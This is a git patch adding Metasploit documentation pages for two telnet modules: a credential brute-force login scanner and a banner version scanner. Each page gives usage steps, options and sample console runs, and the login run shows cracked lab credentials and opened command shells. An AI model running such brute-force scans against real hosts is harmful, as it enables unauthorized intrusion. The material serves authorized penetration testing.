From ff1d00b880aada069cc4b58386cffab671b27239 Mon Sep 17 00:00:00 2001 From: y_k_oo7 Date: Wed, 20 Feb 2019 00:05:09 +0530 Subject: [PATCH] Added Telnet Modules Docs --- .../auxiliary/scanner/telnet/telnet_login.md | 75 +++++++++++++++++++ .../scanner/telnet/telnet_version.md | 31 ++++++++ 2 files changed, 106 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/telnet/telnet_login.md create mode 100644 documentation/modules/auxiliary/scanner/telnet/telnet_version.md diff --git a/documentation/modules/auxiliary/scanner/telnet/telnet_login.md b/documentation/modules/auxiliary/scanner/telnet/telnet_login.md new file mode 100644 index 0000000000..816f0c1202 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/telnet/telnet_login.md @@ -0,0 +1,75 @@ +## Description +This module will test a telnet login with a list of provided credentials on a range of machines and report successful logins. + +## Verification Steps + +1. Do: ```use auxiliary/scanner/telnet/telnet_login``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set THREADS [NUMBER OF THREADS]``` +4. Do: ```set USER_FILE [USERNAME FILE]``` +5. Do: ```set PASS_FILE[PASSWORD FILE]``` +6. Do: ```run``` + +## Options + +This auxiliary module allows you to pass credentials in a number of ways. You can specifically set a username and password, you can pass a list of usernames and a list of passwords for it to iterate through, or you can provide a file that contains usernames and passwords separated by a space. + +### BLANK PASSWORD + +When set to `true`, it'll bruteforce with blank passwords for all users. Default value is `false`. + +### USERNAME + +Only one username to authenticate with. + +### PASSWORD + +Only one password to authenticate with. + +### USERPASS_FILE + +File containing username and passwords separated by space, one pair one line. + +### USER_FILE + +File containing username one per line. + +### PASS_FILE + +File containing passwords one per line. + + +## Scenarios + +In this scan we have provided list of username and passwords files separately. + +``` +msf > use use auxiliary/scanner/telnet/telnet_login +msf auxiliary(scanner/telnet/telnet_login) > set RHOSTS 1.1.1.0/24 +RHOSTS => 1.1.1.0/24 +msf auxiliary(scanner/telnet/telnet_login) > set THREADS 254 +THREADS => 254 +msf auxiliary(scanner/telnet/telnet_login) > set BLANK_PASSWORDS false +BLANK_PASSWORDS => false +msf auxiliary(scanner/telnet/telnet_login) > set USER_FILE users.txt +USER_FILE => users.txt +msf auxiliary(scanner/telnet/telnet_login) > set PASS_FILE passwords.txt +PASS_FILE => passwords.txt +msf auxiliary(scanner/telnet/telnet_login) > set VERBOSE false +VERBOSE => false +msf auxiliary(scanner/telnet/telnet_login) >run + +[+] 1.1.1.116 - SUCCESSFUL LOGIN root : s00p3rs3ckret +[*] Command shell session 1 opened (1.1.1.101:50017 -> 1.1.1.116:23) at 2010-10-08 06:48:27 -0600 +[+] 1.1.1.116 - SUCCESSFUL LOGIN admin : s00p3rs3ckret +[*] Command shell session 2 opened (1.1.1.101:41828 -> 1.1.1.116:23) at 2010-10-08 06:48:28 -0600 +[*] Scanned 243 of 256 hosts (094% complete) +[+] 1.1.1.56 - SUCCESSFUL LOGIN msfadmin : msfadmin +[*] Command shell session 3 opened (1.1.1.101:49210 -> 1.1.1.56:23) at 2010-10-08 06:49:07 -0600 +[*] Scanned 248 of 256 hosts (096% complete) +[*] Scanned 250 of 256 hosts (097% complete) +[*] Scanned 255 of 256 hosts (099% complete) +[*] Scanned 256 of 256 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(scanner/telnet/telnet_login) > +``` diff --git a/documentation/modules/auxiliary/scanner/telnet/telnet_version.md b/documentation/modules/auxiliary/scanner/telnet/telnet_version.md new file mode 100644 index 0000000000..7aa5424911 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/telnet/telnet_version.md @@ -0,0 +1,31 @@ +## Description +This module will scan a range of machines and prints any telnet servers that are running on it. + +## Verification Steps + +1. Do: ```use auxiliary/scanner/telnet/telnet_version``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set THREADS [number of threads]``` +4. Do: ```run``` + +## Scenarios + +``` +msf > use auxiliary/scanner/telnet/telnet_version +msf auxiliary(scanner/telnet/telnet_version) > set RHOSTS 1.1.1.0/24 +RHOSTS => 1.1.1.0/24 +msf auxiliary(scanner/telnet/telnet_version) > set THREADS 254 +THREADS => 254 +msf auxiliary(scanner/telnet/telnet_version) > run + +[*] 1.1.1.2:23 TELNET (GSM7224) \x0aUser: +[*] 1.1.1.56:23 TELNET Ubuntu 8.04\x0ametasploitable login: +[*] 1.1.1.116:23 TELNET Welcome to GoodTech Systems Telnet Server for Windows NT/2000/XP (Evaluation Copy)\x0a\x0a(C) Copyright 1996-2002 GoodTech Systems, Inc.\x0a\x0a\x0aLogin username: +[*] Scanned 254 of 256 hosts (099% complete) +[*] Scanned 255 of 256 hosts (099% complete) +[*] Scanned 256 of 256 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(scanner/telnet/telnet_version) > +``` + +